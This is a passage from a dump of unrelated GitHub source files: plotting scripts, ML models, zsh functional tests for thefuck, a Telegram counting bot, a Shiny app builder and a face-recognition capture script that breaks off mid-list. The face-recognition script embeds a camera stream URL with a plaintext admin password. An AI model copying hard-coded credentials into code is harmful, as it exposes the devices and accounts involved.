'2015-06-25'\n","repo_name":"ustcck/weiboSearchCrawler","sub_path":"weiboSearchCrawler/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4951574945","text":"import argparse\nimport pickle\n# from matplotlib import figure as fig\nimport numpy as np\nimport torch\n\nimport matplotlib.pyplot as plt\n\ndef plot_data(pickle_location):\n \n with open(pickle_location, 'rb') as f:\n crys_array_list = pickle.load(f)\n \n fig = plt.figure(figsize=(15,10),layout=\"constrained\")\n ax = fig.subplot_mosaic(\"\"\"AB\n CC\n DD\n EE\"\"\")\n\n for i in range(0,10):\n ax['A'].plot(crys_array_list['all_atom_types_stack'][0, :, i, 0])\n ax['B'].plot(crys_array_list['all_atom_types_stack'][0, :, i, 1])\n\n\n ax['C'].plot(crys_array_list['all_frac_coords_stack'][0, :, i, 0], alpha=0.6)\n ax['D'].plot(crys_array_list['all_frac_coords_stack'][0, :, i, 1], alpha=0.6)\n ax['E'].plot(crys_array_list['all_frac_coords_stack'][0, :, i, 2], alpha=0.6)\n\n\n plt.savefig(pickle_location[:-7] + '.png')\n\n\ndef main(args):\n \n plot_data(args.pickle_location) \n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--pickle_location')\n\n\n args = parser.parse_args()\n\n main(args)\n","repo_name":"merri5/score_based_crystal_generation","sub_path":"scripts/plot_traj_joint.py","file_name":"plot_traj_joint.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15608932615","text":"import os, sys\nimport pandas as pd\nsys.path.append('../')\nfrom fingerprint.fingeprint_from_smiles import smiles_list_to_fingerprint_dataframe\n\ndef XGBoost_estimator(smiles_list, mode):\n assert type(smiles_list) == list, 'Please input smiles as for list type'\n nBits = 2048\n radius = 3\n df = smiles_list_to_fingerprint_dataframe(smiles_list, nBits=nBits, radius=radius)\n\n x = df.iloc[:, 1:nBits]\n\n if mode == 'BDE':\n model = 'input model in here'\n else:\n model = 'input model in here'\n\n pred_BDE = model.predict(x)\n\n df_gen = pd.DataFrame()\n df_gen['Smiles'] = smiles_list\n df_gen[mode] = pred_BDE\n\n return df_gen","repo_name":"nebneb200411/photopolymerization_initiator","sub_path":"xgboost_/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73035530293","text":"import pytest\nfrom tests.functional.plots import with_confirmation, without_confirmation, \\\n refuse_with_confirmation, history_changed, history_not_changed, \\\n select_command_with_arrows, how_to_configure\n\ncontainers = (('thefuck/python3-zsh',\n u'''FROM python:3\n RUN apt-get update\n RUN apt-get install -yy zsh''',\n u'zsh'),\n ('thefuck/python2-zsh',\n u'''FROM python:2\n RUN apt-get update\n RUN apt-get install -yy zsh''',\n u'zsh'))\n\n\n@pytest.fixture(params=containers)\ndef proc(request, spawnu, TIMEOUT):\n proc = spawnu(*request.param)\n proc.sendline(u'pip install /src')\n assert proc.expect([TIMEOUT, u'Successfully installed'])\n proc.sendline(u'eval $(thefuck --alias)')\n proc.sendline(u'export HISTFILE=~/.zsh_history')\n proc.sendline(u'echo > $HISTFILE')\n proc.sendline(u'export SAVEHIST=100')\n proc.sendline(u'export HISTSIZE=100')\n proc.sendline(u'setopt INC_APPEND_HISTORY')\n return proc\n\n\n@pytest.mark.functional\ndef test_with_confirmation(proc, TIMEOUT):\n with_confirmation(proc, TIMEOUT)\n history_changed(proc, TIMEOUT, u'echo test')\n\n\n@pytest.mark.functional\ndef test_select_command_with_arrows(proc, TIMEOUT):\n select_command_with_arrows(proc, TIMEOUT)\n history_changed(proc, TIMEOUT, u'git help')\n\n\n@pytest.mark.functional\ndef test_refuse_with_confirmation(proc, TIMEOUT):\n refuse_with_confirmation(proc, TIMEOUT)\n history_not_changed(proc, TIMEOUT)\n\n\n@pytest.mark.functional\ndef test_without_confirmation(proc, TIMEOUT):\n without_confirmation(proc, TIMEOUT)\n history_changed(proc, TIMEOUT, u'echo test')\n\n\n@pytest.mark.functional\ndef test_how_to_configure_alias(proc, TIMEOUT):\n how_to_configure(proc, TIMEOUT)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/nvbn_thefuck/thefuck-master/tests/functional/test_zsh.py","file_name":"test_zsh.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"28428138375","text":"import asyncio\nimport logging\n\nimport aiorun\n\nfrom .core import Protector, setup_log\n\naiorun.logger.disabled = True\nlog = logging.getLogger(\"Main\")\nprotector = Protector()\n\nLOGGER = logging.getLogger(\"__name__\").setLevel(logging.WARNING)\n\ndef start():\n \"\"\"Main entry point\"\"\"\n setup_log()\n log.info(\"Loading code...\")\n\n try:\n import uvloop # pylint: disable=C0415\n except ImportError:\n log.warning(\"uvloop not installed! Skipping...\")\n print(\n \"\\nuvloop not installed! \"\n \"bot will work the same, but in a bit slower speed.\\n\"\n 'You may install it by \"poetry install -E uvloop\" or \"pip install uvloop\"\\n'\n )\n else:\n uvloop.install()\n\n loop = asyncio.new_event_loop()\n aiorun.run(protector.begin(loop=loop), loop=loop)\n","repo_name":"iamarch/Protector","sub_path":"Protector/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"4467051972","text":"from time import sleep\n\n\ndef linha():\n print('-=' * 30)\n\n\ndef maior(*n):\n m = n[0]\n for i in n:\n if i > m:\n m = i\n linha()\n print('Analisando os valores passados', end='')\n for i in range(0, 3):\n sleep(1)\n print('.', end='')\n print(f'\\nOs números inseridos na chamada foram ', end='')\n for j in n:\n print(j, end=' ')\n sleep(.75)\n print(f'e o maior número é {m}')\n\nmaior(2, 9, 4, 5, 7, 1)\nmaior(3,6,4)\nmaior(4,9)\nmaior(0)","repo_name":"themegazord/CursoEmVideo---Python","sub_path":"CursoEmVideo/Exercicios/desafio99.py","file_name":"desafio99.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26990284780","text":"import re\r\nn = int(input())\r\nfor i in range(n):\r\n s = input()\r\n spl = s.split()\r\n \r\n pattern = r\"#[a-fA-F0-9]{3,6}\"\r\n \r\n if len(spl)>1 and \"{\" not in spl :\r\n spl = re.findall(pattern, s)\r\n for i in spl:\r\n print(i)","repo_name":"durgeshbhargava/INNOMATICS_DataScience_Internship","sub_path":"Task - 5 (RegEx)/5.10 Hex Color Code.py","file_name":"5.10 Hex Color Code.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21508107902","text":"from .exceptions import (\n BreakGraphError,\n InnerError,\n NotImplementException,\n inner_error_default_handler,\n)\nfrom .paddle_api_config import (\n is_break_graph_tensor_methods,\n paddle_tensor_methods,\n)\nfrom .utils import (\n ASSERT,\n Cache,\n NameGenerator,\n ResumeFnNameFactory,\n Singleton,\n count_if,\n execute_time,\n get_unbound_method,\n in_paddle_module,\n is_break_graph_api,\n is_builtin_fn,\n is_paddle_api,\n is_strict_mode,\n list_contain_by_id,\n list_find_index_by_id,\n log,\n log_do,\n map_if,\n meta_str,\n no_eval_frame,\n show_trackers,\n)\n\n__all__ = [\n \"InnerError\",\n \"NotImplementException\",\n \"BreakGraphError\",\n \"Singleton\",\n \"NameGenerator\",\n 'inner_error_default_handler',\n \"log\",\n \"log_do\",\n \"no_eval_frame\",\n \"is_builtin_fn\",\n \"is_paddle_api\",\n \"in_paddle_module\",\n \"is_break_graph_api\",\n 'is_break_graph_tensor_methods',\n \"map_if\",\n \"count_if\",\n \"Cache\",\n \"execute_time\",\n \"meta_str\",\n \"is_strict_mode\",\n \"paddle_tensor_methods\",\n \"ASSERT\",\n \"ResumeFnNameFactory\",\n \"list_contain_by_id\",\n \"list_find_index_by_id\",\n \"show_trackers\",\n \"get_unbound_method\",\n]\n","repo_name":"AILab-812/PaddleSOT","sub_path":"sot/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"71077316534","text":"import torch\nfrom torch import nn\n\nclass VSCNN(nn.Module):\n def __init__(self, bands, nc):\n # image_patch: 13x13\n super().__init__()\n self.feature = nn.Sequential(\n nn.Conv3d(1, 20, (3,3,3)),\n nn.ReLU(inplace=True),\n nn.MaxPool3d((1,2,2)),\n nn.Dropout3d(0.05),\n nn.Conv3d(20, 40, (3,3,3)),\n nn.ReLU(inplace=True),\n nn.MaxPool3d((1,2,2))\n )\n self.classifier = nn.Sequential(\n nn.Dropout(0.05),\n nn.Linear((bands-4)*40, 80),\n nn.ReLU(inplace=True),\n nn.Linear(80, nc)\n )\n\n def forward(self, input):\n '''\n :param input: [batchsz, 1, depth, h, w]\n :return: out: [batchsz, nc]\n '''\n f = self.feature(input)\n batchsz = f.shape[0]\n f = f.view((batchsz, -1))\n out = self.classifier(f)\n return out","repo_name":"dohoseok/HSICrop","sub_path":"model/VSCNN.py","file_name":"VSCNN.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35940743382","text":"# 快速排序\n\n# 找一个数作为基准数 大于基数的再右边 否则左边\ndef quick_sort(lists, left, right):\n # 快速排序\n if left >= right:\n return lists\n key = lists[left]\n low = left\n high = right\n while left < right:\n while left < right and lists[right] >= key:\n right -= 1\n lists[left] = lists[right]\n while left < right and lists[left] <= key:\n left += 1\n lists[right] = lists[left]\n lists[right] = key\n quick_sort(lists, low, left - 1)\n quick_sort(lists, left + 1, high)\n return lists\n\n\nif __name__ == '__main__':\n arr = [56, 18, 6, 3, 97, 66, 57, 26, 88, 30, 99,93]\n arr = quick_sort(arr, 0, len(arr) - 1)\n print(arr)\n","repo_name":"CodeTornado/python_demo","sub_path":"work/Sort/quickSort.py","file_name":"quickSort.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40784650686","text":"import queue\nimport threading\n\ndef my_function(argument, result_queue):\n # Your function code here\n result = argument + 1\n result_queue.put(result)\n\n# Create a queue to store the results\nresult_queue = queue.Queue()\n\n# Create threads and pass the queue as an argument\nthread1 = threading.Thread(target=my_function, args=(1, result_queue))\nthread2 = threading.Thread(target=my_function, args=(2, result_queue))\n\n# Start threads\nthread1.start()\nthread2.start()\n\n# Get thread return values from the queue\nthread1_result = result_queue.get()\nthread2_result = result_queue.get()\n\n# Print thread return values\nprint(\"thread1_result:\", thread1_result)\nprint(\"thread2_result:\", thread2_result)","repo_name":"TWRSYB/JavBua_PaChon","sub_path":"01Test/test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2128957851","text":"import os\nfrom misc.new_directory import new_directory\nfrom shutil import copyfile\n\n\ndef build_shiny(global_variables, shiny_info):\n\n build_server(global_variables, shiny_info)\n copy_shiny_files(global_variables)\n get_rdata(global_variables)\n\n\n# builds the server\ndef build_server(global_variables, shiny_info):\n\n SL_path = global_variables[\"SL_path\"]\n out_path = global_variables[\"out_path\"]\n\n # builds the server\n new_directory(os.path.join(out_path, \"shiny\"))\n server_in_file = open(os.path.join(SL_path, \"shiny\", \"app\", \"server_end.r\")).readlines()\n server_out_file = open(os.path.join(out_path, \"shiny\", \"server.r\"), \"w\")\n\n server_out_file.write(\"###--- SERVER ---####\\n\")\n server_out_file.write(\"options(shiny.maxRequestSize=30*1024^2)\\n\")\n server_out_file.write(\"server <- function(input, output, session)\\n\")\n server_out_file.write(\"{\\n\\n\")\n server_out_file.write(shiny_info)\n\n for line in server_in_file:\n server_out_file.write(line)\n\n\n# copies files that don't need any modification\ndef copy_shiny_files(global_variables):\n\n SL_path = global_variables[\"SL_path\"]\n out_path = global_variables[\"out_path\"]\n\n # Adds the UI\n ui_in_path = os.path.join(SL_path, \"shiny\", \"app\", \"ui.r\")\n ui_out_path = os.path.join(out_path, \"shiny\", \"ui.r\")\n copyfile(ui_in_path, ui_out_path)\n\n # Adds the server\n server_in_path = os.path.join(SL_path, \"shiny\", \"app\", \"global.r\")\n server_out_path = os.path.join(out_path, \"shiny\", \"global.r\")\n copyfile(server_in_path, server_out_path)\n\n # Adds the www\n new_directory(os.path.join(out_path, \"shiny\", \"www\"))\n www_in_path = os.path.join(SL_path, \"shiny\", \"app\", \"www\", \"sl2.gif\")\n www_out_path = os.path.join(out_path, \"shiny\", \"www\", \"sl2.gif\")\n copyfile(www_in_path, www_out_path)\n www_in_path = os.path.join(SL_path, \"shiny\", \"app\", \"www\", \"sl2.png\")\n www_out_path = os.path.join(out_path, \"shiny\", \"www\", \"sl2.png\")\n copyfile(www_in_path, www_out_path)\n www_in_path = os.path.join(SL_path, \"shiny\", \"app\", \"www\", \"style.css\")\n www_out_path = os.path.join(out_path, \"shiny\", \"www\", \"style.css\")\n copyfile(www_in_path, www_out_path)\n\n\n#finds the workflow rdata dumps and copies them to the shiny folder\ndef copy_rdata(biotype, global_variables):\n\n out_path = global_variables[\"out_path\"]\n new_directory(os.path.join(out_path, \"shiny\", \"rdata\", biotype))\n\n if global_variables[\"ne_flag\"]:\n\n new_directory(os.path.join(out_path, \"shiny\", \"rdata\", biotype, \"ne_workflow\"))\n rdata_in_path = os.path.join(out_path, biotype, \"ne_workflow\", \"plots\", \"workflow.rdata\")\n rdata_out_path = os.path.join(out_path, \"shiny\", \"rdata\", biotype, \"ne_workflow\", \"workflow.rdata\")\n\n try:\n copyfile(rdata_in_path, rdata_out_path)\n except Exception as e:\n print(\"Warning: the ne workflow Rdata file is missing. It will be omitted from Shiny.\")\n\n\n if global_variables[\"de_workflows_flag\"]:\n\n parsed_de_parameters = global_variables[\"de_parameters\"]\n for de_parameter_dict in parsed_de_parameters:\n\n de_ID = de_parameter_dict[\"de_ID\"]\n de_ID_no_spaces = de_ID.replace(\" \", \"_\")\n new_directory(os.path.join(out_path, \"shiny\", \"rdata\", biotype, \"de_workflows\", de_ID_no_spaces))\n rdata_in_path = os.path.join(out_path, biotype, \"de_workflows\", de_ID_no_spaces, \"plots\", \"workflow.rdata\")\n rdata_out_path = os.path.join(out_path, \"shiny\", \"rdata\", biotype, \"de_workflows\", de_ID_no_spaces, \"workflow.rdata\")\n\n try:\n copyfile(rdata_in_path, rdata_out_path)\n except Exception as e:\n print(\"Warning: the de workflow \" + de_ID + \" Rdata file is missing. It will be omitted from Shiny.\")\n\n if global_variables[\"mde_workflows_flag\"]:\n parsed_mde_parameters = global_variables[\"mde_parameters\"]\n for mde_dict in parsed_mde_parameters:\n \n mde_ID = mde_dict[\"mde_ID\"]\n new_directory(os.path.join(out_path, \"shiny\",\"rdata\", biotype, \"mde_workflows\", mde_ID))\n rdata_in_path = os.path.join(out_path, biotype, \"mde_workflows\", mde_ID, \"plots\", \"workflow.rdata\")\n rdata_out_path = os.path.join(out_path, \"shiny\",\"rdata\", biotype, \"mde_workflows\", mde_ID, \"workflow.rdata\")\n\n try:\n copyfile(rdata_in_path, rdata_out_path)\n except Exception as e:\n print(\"Warning: the Mde workflow \" + mde_ID + \" Rdata file is missing. It will be omitted from Shiny.\")\n\n\n# gets the rdata\ndef get_rdata(global_variables):\n\n out_path = global_variables[\"out_path\"]\n\n # does the work for \"all genes\"\n new_directory(os.path.join(out_path, \"shiny\",\"rdata\"))\n copy_rdata(\"all_genes\", global_variables)\n\n #does the work for the biotypes\n if global_variables[\"biotypes_flag\"] and len(global_variables[\"biotypes_dict\"].keys()) > 1:\n biotypes_dict = global_variables[\"biotypes_dict\"]\n biotypes = sorted(biotypes_dict.keys())\n for biotype in biotypes:\n copy_rdata(biotype, global_variables)\n\n\n\n\n\n","repo_name":"Searchlight2/Searchlight2","sub_path":"software/shiny/build_shiny.py","file_name":"build_shiny.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"21"} +{"seq_id":"15289137341","text":"import os\nimport sys\n\nsys.path.append(os.path.abspath(os.pardir))\n\nimport helper\n\ndef eval(pred_values, true_values, metric):\n total_score = 0\n for index in range(len(pred_values)):\n total_score += metric(pred_values[index], true_values[index])\n return total_score\n\nex1 = [[[0.2], [0.5]], [[-0.4], [-0.1]]]\nex2 = [[[0.9], [0.2]], [[0.8], [0.3]]]\nex3 = [[[0.2, 0.3]], [[-0.1, -0.2]]]\n\nall_examples = [('Example 1', ex1), ('Example 2', ex2), ('Example 3', ex3)]\nall_metrics = [helper.metric1, helper.metric2, helper.metric3]\n\nflatten = lambda values: [value for sublist in values for value in sublist]\n\nfor name, example in all_examples:\n print(name)\n for i, metric in enumerate(all_metrics):\n pred_values = example[0]\n true_values = example[1]\n no_sentences = len(example)\n no_samples = len(flatten(pred_values))\n if i == 0:\n # Reference: http://stackoverflow.com/questions/952914/making-a-flat-list-out-of-list-of-lists-in-python\n flatten = lambda values: [value for sublist in values for value in sublist]\n pred_values = flatten(pred_values)\n true_values = flatten(true_values)\n metric_score = metric(pred_values, true_values)\n\n elif i == 1:\n metric_score = eval(pred_values, true_values, metric) / no_sentences\n elif i == 2:\n metric_score = eval(pred_values, true_values, metric) / no_samples\n\n print('metric {}, value {}'.format(i+1, round(metric_score, 3)))\n","repo_name":"apmoore1/semeval","sub_path":"examples/metric_examples.py","file_name":"metric_examples.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"73191272371","text":"#!/usr/bin/env python3\nimport logging\n\nfrom telegram.ext import Updater, CommandHandler, Filters, Defaults, PicklePersistence\n\nfrom config import *\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\n\nstart = 'The count has been set to 0\\nRaise it with /count [number]'\nhelp = 'Raise the count with /count, /ct, or /c and a number'\neggs = {69:'\\nnice ;)', 420:'\\ngo green my dudes', 42: '\\nthe answer to the ultimate question of life, the universe, and everything', 100:'\\nnow we\\'re getting somewhere!', 1000:'\\nplease go do your work'}\nnum_list = '0123456789+-*/%^.()&|<>'\n\n\ndef send_start(update, context):\n chat_id = update.message.chat_id\n print('in start')\n\n if 'count' not in context.chat_data:\n context.chat_data['count'] = 0\n context.chat_data['stats'] = {}\n\n context.bot.send_message(chat_id=chat_id, text=start,\n parse_mode='Markdown')\n\n\ndef send_help(update, context):\n chat_id = update.message.chat_id\n\n context.bot.send_message(chat_id=chat_id, text=help,\n parse_mode='Markdown')\n\n\ndef send_count(update, context):\n chat_id = update.message.chat_id\n sender = update.message.from_user['id']\n print('in count')\n\n if len(context.args) > 0:\n\n number = clean_number(''.join(context.args))\n print(number, sender)\n\n if number == '':\n message = 'That is not a number'\n context.bot.send_message(chat_id=chat_id, text=message,\n parse_mode='Markdown')\n return\n\n number = int(eval(number))\n\n if 'count' in context.chat_data:\n if number == context.chat_data['count']+1 and ('sender' not in context.chat_data or context.chat_data['sender'] != sender):\n context.chat_data['count'] = number\n context.chat_data['sender'] = sender\n update_stats(update, context, number, True)\n if number % 10 == 0 or number in eggs:\n message = f\"The count is {number}\"\n if number in eggs:\n message = message + eggs[number]\n context.bot.send_message(chat_id=chat_id, text=message,\n parse_mode='Markdown')\n else:\n context.chat_data['count'] = 0\n context.chat_data['sender'] = 0\n update_stats(update, context, number, False)\n message = 'The count is reset to 0'\n context.bot.send_message(chat_id=chat_id, text=message,\n parse_mode='Markdown')\n else:\n if number == 1:\n context.chat_data['count'] = 1\n context.chat_data['stats'] = {}\n context.chat_data['sender'] = sender\n message = f\"The count is {number}\"\n context.bot.send_message(chat_id=chat_id, text=message,\n parse_mode='Markdown')\n else:\n context.chat_data['count'] = 0\n context.chat_data['stats'] = {}\n message = 'The count has been set to 0'\n context.bot.send_message(chat_id=chat_id, text=message,\n parse_mode='Markdown')\n\n\ndef send_stats(update, context):\n chat_id = update.message.chat_id\n print('in stats')\n\n highscore = max(list(int(context.chat_data['stats'][user_id]['highscore']) for user_id in context.chat_data['stats'].keys()))\n successes = sum(list(int(context.chat_data['stats'][user_id]['successes']) for user_id in context.chat_data['stats'].keys()))\n failures = sum(list(int(context.chat_data['stats'][user_id]['failures']) for user_id in context.chat_data['stats'].keys()))\n personal_stats = []\n for user_id in context.chat_data['stats']:\n user_name = context.chat_data[\"stats\"][user_id][\"username\"]\n user_score = context.chat_data[\"stats\"][user_id][\"highscore\"]\n user_success = context.chat_data[\"stats\"][user_id][\"successes\"]\n user_fail = context.chat_data[\"stats\"][user_id][\"failures\"]\n personal_stats.append(f'\\n\\n*@ {user_name}*\\nHigh score: {user_score}\\nSuccesses: {user_success}\\nFailures: {user_fail}')\n personal_stats = ''.join(personal_stats)\n\n message = f\"*Overall stats*\\nHigh score: {highscore}\\nTotal successes: {successes}\\nTotal failures: {failures}{personal_stats}\"\n context.bot.send_message(chat_id=chat_id, text=message,\n parse_mode='Markdown')\n\n\ndef clean_number(numstr):\n result = ''.join(filter(lambda x: x in num_list, numstr))\n result = result.lstrip('+*/%^.)')\n result = result.rstrip('+-*/%^.(')\n return result\n\n\ndef update_stats(update, context, number, success):\n user_id = str(update.message.from_user['id'])\n username = update.message.from_user['username']\n print('in update')\n\n if number != 1:\n if user_id not in context.chat_data['stats']:\n context.chat_data['stats'][user_id] = {'highscore': 0, 'successes': 0, 'failures': 0, 'username': username}\n\n if username != context.chat_data['stats'][user_id]['username']:\n context.chat_data['stats'][user_id]['username'] = username\n\n if success:\n if number > context.chat_data['stats'][user_id]['highscore']:\n context.chat_data['stats'][user_id]['highscore'] = number\n context.chat_data['stats'][user_id]['successes'] += 1\n else:\n context.chat_data['stats'][user_id]['failures'] += 1\n\n\ndef main():\n defaults = Defaults(disable_web_page_preview=True)\n pp = PicklePersistence(filename='chat_data_states', store_user_data=False,\n store_bot_data=False)\n\n updater = Updater(BOT_TOKEN, use_context=True, persistence=pp, defaults=defaults)\n\n dp = updater.dispatcher\n print('f')\n\n dp.add_handler(CommandHandler(\"start\", send_start))\n dp.add_handler(CommandHandler(\"help\", send_help))\n dp.add_handler(CommandHandler([\"count\", \"ct\", \"c\"], send_count))\n dp.add_handler(CommandHandler([\"stats\", \"getstats\"], send_stats))\n\n updater.start_polling()\n\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yrafalin/TelegramBots","sub_path":"CountingBot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6396,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36695573442","text":"name = input()\n\nevaluation = 0\ncurrent_grade = 0\nfails = 0\n\nwhile True:\n current_evaluation = float(input())\n\n if current_evaluation < 4:\n fails += 1\n if fails == 2:\n break\n continue\n\n if current_evaluation >= 4:\n current_grade += 1\n evaluation += current_evaluation\n\n if current_grade >= 12:\n break\n\naverage_evaluation = evaluation / 12\n\nif fails >= 2:\n print(f\"{name} has been excluded at {current_grade + 1} grade\")\nelse:\n print(f\"{name} graduated. Average grade: {average_evaluation:.2f}\")\n\n\n","repo_name":"BlackRock17/Programming-Basics-Python-2022","sub_path":"While_Loop/graduation.py","file_name":"graduation.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21742762072","text":"#!/usr/bin/env python3\n\nimport sys\n\n\nclass Combination:\n\n def __init__(self):\n self.pongs = []\n self.chows = []\n self.eye = None\n self.winning_tile = None\n\n def count_sets(self):\n return len(self.pongs) + len(self.chows)\n\n def set_eye(self, eye_index):\n self.eye = eye_index\n\n def set_winning_tile(self, tile_index):\n self.winning_tile = tile_index\n\n def is_all_pong(self):\n pass\n\n def __str__(self):\n buffer = ''\n if not self.winning_tile == None:\n buffer += f'[{self.winning_tile + 1}] '\n buffer += '['\n all_sets = self.chows + self.pongs\n all_sets.sort(key=lambda x: x[0])\n for chow in all_sets:\n for tile in chow:\n buffer += str(tile + 1)\n buffer += ' '\n buffer = buffer.strip()\n if not self.eye == None:\n buffer += ' ' + str(self.eye + 1) * 2\n buffer += ']'\n return buffer\n\n\ndef hand_str_to_freq(hand):\n \"\"\"'2234' -> (0, 2, 1, 1, 0, 0, 0, 0, 0)\"\"\"\n frequency_hand = [0] * 9\n for tile in hand:\n frequency_hand[int(tile) - 1] += 1\n return tuple(frequency_hand)\n\n\ndef hand_freq_to_str(hand):\n \"\"\"(0, 2, 1, 1, 0, 0, 0, 0, 0) -> '2234'\"\"\"\n buffer = ''\n for i in range(len(hand)):\n buffer += hand[i] * str(i + 1)\n return buffer\n\n\ndef find_pong(hand, i):\n if hand[i] >= 3:\n hand[i] -= 3\n return (i,) * 3\n return\n\n\ndef find_chows(hand, i):\n chows = []\n # If the next 2 consecutive tiles are beyond the size of the hand, skip\n if i + 2 >= len(hand):\n return chows\n sets = min(hand[i], hand[i + 1], hand[i + 2])\n for j in range(3):\n hand[i + j] -= sets\n for _ in range(sets):\n chows.append((i, i + 1, i + 2))\n return chows\n\n\ndef find_sets(hand):\n combination = Combination()\n hand = list(hand)\n for i in range(len(hand)):\n # Pongs\n pong = find_pong(hand, i)\n if pong:\n combination.pongs.append(pong)\n # Chows\n combination.chows.extend(find_chows(hand, i))\n return combination\n\n\ndef find_sets_chows_first(hand):\n combination = Combination()\n hand = list(hand)\n for i in range(len(hand)):\n # Chows\n combination.chows.extend(find_chows(hand, i))\n # Pongs\n pong = find_pong(hand, i)\n if pong:\n combination.pongs.append(pong)\n return combination\n\n\ndef find_hu(hand):\n win_combis = []\n size = sum(hand)\n if (size > 14 or size < 2) or (size - 1) % 3 == 0:\n print('Incomplete hand.')\n return win_combis\n\n # Detect if the eyes are already formed outside of this hand\n eyes_outside = size % 3 == 0\n\n # Calculate number of sets\n sets = size // 3\n\n if eyes_outside:\n combination = find_sets(hand)\n if combination.count_sets() == sets:\n win_combis.append(combination)\n if len(combination.pongs) >= 3:\n combination = find_sets_chows_first(hand)\n if not len(combination.pongs) >= 3:\n win_combis.append(combination)\n else:\n # If the eyes are inside, find and remove it\n for i in range(len(hand)):\n if hand[i] < 2:\n continue\n hand_eyeless = list(hand)\n hand_eyeless[i] -= 2\n hand_eyeless = tuple(hand_eyeless)\n combination = find_sets(hand_eyeless)\n if combination.count_sets() == sets:\n combination.set_eye(i) # add back the eyes\n win_combis.append(combination)\n if len(combination.pongs) >= 3:\n combination = find_sets_chows_first(hand_eyeless)\n if not len(combination.pongs) >= 3:\n combination.set_eye(i) # add back the eyes\n win_combis.append(combination)\n\n return win_combis\n\n\ndef find_waits(hand_str):\n waits = []\n hand_str = hand_str.strip()\n size = len(hand_str)\n if (size > 13 or size < 1) or size % 3 == 0:\n print('Hand is not waiting.')\n return waits\n\n try:\n hand = hand_str_to_freq(hand_str)\n except ValueError:\n print('Hand is invalid, contains characters.')\n return waits\n\n # Check if adding any tile (1-9) will make this hand win/hu\n for tile in range(9):\n\n # If there's more than 4 of the same tile, hand is invalid \n if hand[tile] > 4:\n print(f'Hand is invalid, more than four of tile {tile + 1}.')\n return waits\n\n # If there's already 4 of the same tiles, skip\n if hand[tile] == 4:\n continue\n\n # Make a copy and add 1 tile to test out\n test_hand = list(hand)\n test_hand[tile] += 1\n test_hand = tuple(test_hand)\n win_combis = find_hu(test_hand)\n for combi in win_combis:\n combi.set_winning_tile(tile)\n waits.extend(win_combis)\n\n return waits\n\n\ndef generate_output(waits):\n buffer = ''\n tiles = []\n for c in waits:\n buffer += str(c) + '\\n'\n if c.winning_tile + 1 not in tiles:\n tiles.append(c.winning_tile + 1)\n buffer += f'\\nYou\\'re waiting for: {tiles}'\n return buffer\n\n\ndef main():\n if len(sys.argv) < 2:\n print(f'Usage: {sys.argv[0]} 3334567')\n exit(1)\n hand = sys.argv[1]\n\n waits = find_waits(hand)\n print(generate_output(waits))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Optixal/Machi","sub_path":"machi.py","file_name":"machi.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20831110225","text":"import face_recognition\nimport cv2\nimport os\nimport string\nimport threading\nimport Queue\nimport time\n\n#Variables\ninputQueue = Queue.Queue()\noutputQueue = Queue.Queue()\nname = raw_input('Enter Name: ').lower()\ncamera = cv2.VideoCapture('rtmp://192.168.20.144:1935/flash/12:admin:EYE3inapp')\n\nknown_face_names = [\n name\n]\n\n\n\n\nwhile True:\n\trval, frame = camera.read()\n\tcv2.imshow(\"Video\", frame)\n\tkey = cv2.waitKey(20)\n\tif key == 1048603: # exit on ESC\n\t\tbreak\n\tif key == 1048586: # Enter button to take picture \n\t\tfolder = 'images/'+name\n\t\tif not os.path.exists(folder):\n\t\t\toriginal_umask = os.umask(0)\n\t\t\tos.makedirs(folder)\n\t\n\t\tcv2.imwrite(folder + '/' + name + '.jpg',frame)\n\t\tbreak\n\ncv2.destroyWindow('Video')\n\n\nimage_name = face_recognition.load_image_file('images/'+ name + '/' + name + '.jpg')\nimage_face_encoding = face_recognition.face_encodings(image_name)[0]\nknown_face_encodings = [\n 